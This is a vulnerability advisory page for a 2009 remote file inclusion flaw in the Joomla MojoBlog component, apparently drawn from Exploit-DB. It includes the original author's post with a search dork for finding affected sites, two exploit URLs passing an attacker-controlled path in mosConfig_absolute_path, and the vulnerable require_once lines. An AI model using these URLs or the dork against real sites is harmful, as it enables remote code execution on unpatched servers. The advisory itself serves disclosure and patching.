Joomla Component MojoBlog Multiple Remote File Include vulnerability

vendor:

MojoBlog

by:

kaMtiEz

9.3

CVSS

HIGH

RFI

CWE

Product Name: MojoBlog

Affected Version From: RC0.15

Affected Version To: RC0.15

Patch Exists: YES

Related CWE: N/A

CPE: a:joomlify:mojoblog

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component MojoBlog Multiple Remote File Include vulnerability

A vulnerability exists in Joomla Component MojoBlog RC0.15, which allows a remote attacker to include arbitrary files from remote locations. This is due to the application not properly sanitizing user-supplied input to the 'mosConfig_absolute_path' parameter in the 'wp-comments-post.php' and 'wp-trackback.php' scripts. An attacker can exploit this vulnerability to include arbitrary files from remote locations, which can lead to the execution of arbitrary code on the vulnerable system.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the application.

Source

Exploit-DB raw data:

#########################################################################
## Joomla Component MojoBlog Multiple Remote File Include vulnerability #
## Author : kaMtiEz (kamzcrew@yahoo.com)  			        #
## Homepage : http://www.indonesiancoder.com    	     		#
## Date : November 20, 2009 						#
#########################################################################

[ Software Information ]

[+] Vendor : http://www.joomlify.com/
[+] Download : http://www.joomlify.com/files/mojoblog/
[+] version : RC0.15
[+] Vulnerability : RFI
[+] Dork : inurl:"com_mojo"

#########################################################################

[ Vulnerable File ]

http://server/components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]

http://server/components/com_mojo/wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]

[ BUG IN ]

[1] wp-comments-post.php

[2] wp-trackback.php
======================

[1] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php'); 

[2] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php'); 

[ FIX ]

contact me .. or aurakasih ..

Joke.. ;)
#########################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ] 

[+] one day .. u will be mind ..
[+] bangun tidur coba mencari celah .. dapet juga ,, :D
[+] aurakasih .. aku butuh kamuwh .. hha
[+] om tukulesto kapan ke kotaku ?? hha